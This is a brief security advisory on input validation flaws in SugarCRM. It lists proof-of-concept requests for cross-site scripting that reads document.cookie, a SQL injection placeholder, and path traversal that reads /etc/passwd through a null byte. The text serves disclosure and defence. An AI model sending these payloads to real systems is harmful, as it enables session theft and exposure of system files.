SugarCRM Multiple Input Validation Vulnerabilities

SugarCRM Multiple Input Validation Vulnerabilities

An exploit is not required.

The following proof of concept examples are available:
/index.php?action=UnifiedSearch&module=Home&search_form=false&query _string=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E /index.php?module=Accounts&action=ListView&query=true&name=[XSS]

/index.php?action=index&module=Home&mod_strings[LNK_NEW_CONTACT]= %3Cscript%3Ealert(document.cookie)%3C/script%3E

/modules/Users/Error.php?app_strings[NTC_CLICK_BACK]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

index.php?action=DetailView&module=Accounts&record=[SQL]

/index.php?module=Opportunities&action=../../../../../../../../etc /passwd%00&advanced=true
/index.php?action=DetailView&module=../../../../../etc/passwd%00